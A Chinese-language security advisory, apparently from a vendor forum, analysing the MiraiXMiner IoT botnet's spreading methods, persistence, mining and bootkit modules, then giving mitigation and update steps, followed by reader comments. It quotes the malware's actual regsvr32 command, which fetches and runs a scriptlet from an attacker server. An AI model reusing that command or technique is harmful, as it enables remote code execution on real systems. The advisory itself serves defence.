具备多病毒功能！MiraiXMiner物联网僵尸网络攻击来袭

具备多病毒功能！MiraiXMiner物联网僵尸网络攻击来袭

近日，某公司安全团队跟踪到一新型的物联网僵尸网络，其融合了多种已知病毒家族的特点，包括Mirai物联网僵尸网络病毒、MyKings僵尸网络病毒、暗云木马、挖矿等，传播方式包括利用永恒之蓝漏洞、闭路电视物联网设备漏洞、MySQL漏洞等，也包括RDP爆破和Telnet爆破等弱口令爆破。

某公司已将其命名为MiraiXMiner，并且制定了完善的防御措施。现发布安全预警，提醒广大用户防范MiraiXMiner攻击。

病毒名称：MiraiXMiner

病毒性质：僵尸网络病毒、暗云木马、挖矿病毒等

影响范围：目前国内已有感染案例

危害等级：高危

传播方式：利用永恒之蓝漏洞、闭路电视物联网设备漏洞、MySQL漏洞等，也包括RDP爆破和Telnet爆破等弱口令爆破。

病毒分析

01

攻击流程

具体流程如下：

1. 病毒母体msinfo.exe通过注册服务&写入恶意代码到数据库的手段，实现持久化攻击。

2. 根据C&C命令从云端下载任意的攻击模块，此次的攻击模块为csrs.exe。

3. 添加恶意特权账户admin$。

4.从黑客服务器下载三个子模块：后门模块、DNS劫持模块、净化＆下载挖矿模块。

5. 后门模块up.rar经过分析发现为有名的BootKit暗云木马。

6. u.exe通过篡改DNS配置文件达到劫持DNS的目的。

7. 净化模块upsnew2.exe的功能很多，除了杀死同行病毒，添加自启动项以外，还会停止Windows自动更新服务，以更稳定地控制受害主机。

8. 使用扫描工具和Mirai攻击库对内网设备进行大范围攻击。

9. 最后，母体msinfo.exe会连接云端，自动更新病毒，实时下载最新的攻击模块。

02

传播模块

最开始，通过ARP进行扫描操作确认MAC地址等信息：

扫描445端口，如下所示：

通过内置的masscan程序进行扫描，如下所示：

对扫描到的目标，进行相应的攻击行为，如下所示：

1、执行永恒之蓝攻击行为CrackerMS17-010：

2、攻击CCTV物联网设备漏洞CrackerCCTV：

3、攻击MYSQL漏洞CrackerMYSQL：

然后执行下面的数据库Payload命令过程，如下所示：

将如下恶意代码写入数据库存储过程中，如下所示：

恶意代码分别为：

对RDP进行攻击CrackerRDP：

对Telnet进行攻击CrackerTelnet：

03

创建admin$账号

从服务器上下载相应的配置文件，然后解密，如下所示：

然后解密出相应的XML文件，进行下载执行恶意程序操作：

下载回来的CSRS是一个python脚本编写后生成的EXE，主要是一个Exploit，用于通过MS17-010漏洞，添加帐号：

添加之后的主机，如下图所示：

执行MS17-010漏洞攻击：

其中，攻击的参数如下所示：

04

挖矿与暗云木马

下载恶意程序，通过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll，如下所示：

解密出上面的XML脚本：

Upsnew2释放暗云木马item.dat以及c3.bat脚本。

其中c3.bat脚本功能分别为：

1、清除其他病毒。

2、开启MSSQLSERVER。

3、在注册表以及任务计划中添加自启动。

4、关闭自动更新。

5、加载暗云木马。

6、配置防火墙策略，关闭135、137、138、139、445端口，防止再被其它病毒感染。

解决方案

1、隔离感染主机：已中毒计算机尽快隔离，关闭所有网络连接，禁用网卡。

2、切断传播途径：关闭潜在终端的SMB 445等网络共享端口，关闭异常的外联访问。某公司下一代防火墙用户，可开启IPS和僵尸网络功能（需升级到20181204版本），进行封堵。

某公司下一代防火墙配置方法：

①确认当前设备版本和规则库版本：

规则库版本，确认“IPS漏洞特征识别库”和“热门威胁”库版本，保持当前最新即可。【系统】——【系统维护】——【系统更新】——【库升级】，如下图：

设备版本，建议升级至AF8.0.5及以上版本，以获取更快速的更新能力及更好的防护效果。

②开启安全功能：针对此次的MiraiXMiner物联网僵尸网络防护，某公司 AF建议可以开启 “漏洞攻击防护”和“僵尸网络”两个功能，配置如下：

新增针对“用户上网终端”的防护策略：【策略】—【安全防护策略】—“新增”—“用户防护策略”，开启“漏洞攻击防护”和“僵尸网络”两个功能，动作全部选择“拒绝”。配置如下：

某公司EDR微隔离封锁配置方法：

①对MiraiXMiner使用到的传播端口运行封堵。TCP（135、137、138、139、445）端口，对共享服务的端口运行封堵。

②对需要访问共享服务的终端及服务器进行放通

配置完成，如下所示

3、查找攻击源：借助某公司安全感知平台检测内网攻击源。

SIP更新IOC库步骤：

①SIP能连接互联网情况：

IOC库需要更新到12月4号，平台将会自动升级，也可以手动触发升级：

更新完成后如下，更新到12月4号的IOC库。

②SIP不能连接互联网情况：

手动导入IOC库到12月4号

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000021428125#/100000035154687/all

导入完成后，如下，更新到12月4号的IOC库。

4、查杀病毒：推荐使用某公司终端安全检测响应平台EDR进行查杀，病毒库需升级到20181204版本。

EDR更新病毒库步骤：

①EDR管理平台能连接互联网情况：

平台会10分钟连接升级服务器检测一次是否有库更新。

②EDR管理平台不能联网情况：

离线更新病毒库到12月4号

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000037221875/all

病毒库需要解压，得到pkg文档。

导入完成后，点击确认

5、修补漏洞：打上永恒之蓝MS17-010等漏洞相关补丁。

感谢大佬

感谢大佬的分享，学习了

关注下，学习下

学习啦  收藏

关注，学习

大佬大佬

很好，多谢分享……

某公司AF功能强大啊

感谢分享